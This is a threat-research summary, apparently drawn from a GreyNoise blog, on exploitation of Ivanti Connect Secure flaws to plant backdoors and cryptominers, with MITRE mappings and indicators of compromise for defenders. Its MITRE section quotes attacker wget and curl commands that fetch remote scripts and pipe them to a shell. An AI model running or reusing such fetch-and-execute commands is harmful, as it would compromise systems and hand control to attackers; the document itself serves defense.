Threat Research

Ivanti Connect Secure Exploited to Install Cryptominers | GreyNoise Blog

Securonix

Ivanti Connect Secure vulnerabilities CVE-2023-46805 and CVE-2024-21887 are being exploited to install backdoors and cryptominers, with multiple payloads and persistence mechanisms observed. The write-up details three distinct payloads, their download and persistence chains, Go/UPX-packed components, and a range of IOCs defenders can use to block the activity. #IvantiConnectSecure #CVE-2023-46805 #CVE-2024-21887 #cryptominer #watchd0g #watchbog #Greynoise

Keypoints

  • Exploits Ivanti Connect Secure vulnerabilities CVE-2023-46805 and CVE-2024-21887 using a public exploit.
  • Payload 1 installs a persistent backdoor via cron and downloads a 64-bit backdoor binary.
  • Payload 2 fetches and executes additional malware (m.sh) from GitHub, including watchd0g/watchbog components; files are UPX-packed.
  • Payload 3 downloads a script to deploy a Monero miner via an SSH-based backdoor, and sets up systemd services and config JSON.
  • Indicators include multiple SHA-256 hashes, suspicious paths (e.g., /etc/, /tmp/watchd0g), and IPs such as 45.130.22.219 and 192.252.183.116, plus GitHub/raw URLs.
  • defenders are advised to look for /tmp/watchd0g and /tmp/watchbog, the .ssh_miner systemd service, and related cron entries as early signs of compromise.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The payloads are exploiting vulnerabilities in Ivanti Connect Secure to gain access. “payloads are all leveraging a pair of vulnerabilities in Ivanti Connect Secure – CVE-2023-46805 and CVE-2024-21887, written about here, and with a public exploit available.”
  • [T1053.005] Scheduled Task/Job: Cron – The backdoor is installed as a persistent cron job. “As of writing, that file is live and installs a persistent backdoor using cron:”
  • [T1027.001] Obfuscated/Compressed Files and Information – Several payloads are UPX-packed or appear obfuscated (Go binaries). “Those files appear to be written in Go and somewhat obfuscated (or maybe Go always looks obfuscated?)”
  • [T1105] Ingress Tool Transfer – The attackers download payloads from remote servers (wget/curl) to fetch binaries and scripts. “wget –timeout=20 –no-check-certificate -q -O- https://[ip]/ivanti.js|sh;n” and “wget https://raw.githubusercontent.com/[momika233]/test/main/m.sh”
  • [T1059.004] Unix Shell – The campaigns rely on Unix shell commands (wget, curl, sh, bash) to fetch and execute payloads. “type curl && curl -o /tmp/script.sh …” and the decoded commands show shell execution patterns.
  • [T1543.003] Create or Modify Systemd Service (Linux) – The activity includes installing a systemd service (and a .profile backdoor). “That appears to install an ssh server, install a .json configuration file, and set up a systemd service, as well as a backdoor in the user’s .profile file.”

Indicators of Compromise

  • [SHA256] – backdoor – 0c9ada54a8a928a747d29d4132565c4ccecca0a02abe8675914a70e82c5918d2, bbfba00485901f859cf532925e83a2540adfe01556886837d8648cd92519c68d, and 5 more hashes
  • [SHA256] – ivanti.js – cf20940907be484440e8343aa05505ad2e4d6d1f24ef29504bfa54ade4a8455f, 4cba272d83f6ff353eb05e117a1057699200a996d483ca56fa189e9eaa6bb56c, and 5 more hashes
  • [SHA256] – script.sh – 4cba272d83f6ff353eb05e117a1057699200a996d483ca56fa189e9eaa6bb56c, cf20940907be484440e8343aa05505ad2e4d6d1f24ef29504bfa54ade4a8455f, and 5 more hashes
  • [SHA256] – watchbog – 8eadb5beeb21d4a95dacd133cb2b934342fcb39fe4df2a8387a0d5499c72450d, 1e1e94bd2bfd5054265123bf55c4cf6ce87de6692d9329bda4a37e89272356e4, and 5 more hashes
  • [SHA256] – watchd0g – 1e1e94bd2bfd5054265123bf55c4cf6ce87de6692d9329bda4a37e89272356e4, 45c9578bbceb2ce2b0f10133d2f3f708e78c8b7eb3c52ad69d686e822f9aa65f, and 5 more hashes
  • [SHA256] – config.json – 45c9578bbceb2ce2b0f10133d2f3f708e78c8b7eb3c52ad69d686e822f9aa65f, 4cba272d83f6ff353eb05e117a1057699200a996d483ca56fa189e9eaa6bb56c, and 5 more hashes
  • [SHA256] – script.sh – 4cba272d83f6ff353eb05e117a1057699200a996d483ca56fa189e9eaa6bb56c, 0c9ada54a8a928a747d29d4132565c4ccecca0a02abe8675914a70e82c5918d2, and 5 more hashes
  • [Path] – /etc/, /tmp/watchd0g, and 2 more paths
  • [Path] – /tmp/watchbog, /tmp/script.sh, and 2 more paths
  • [Path] – $HOME/.ssh/config.json, $HOME/.ssh/sshd, and 2 more paths
  • [IP] – 45.130.22.219, 192.252.183.116, and 1 more IP
  • [URL] – https://raw.githubusercontent.com/momika233/test/main/m.sh, and 1 more URL

Read more: https://www.greynoise.io/blog/ivanti-connect-secure-exploited-to-install-cryptominers

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint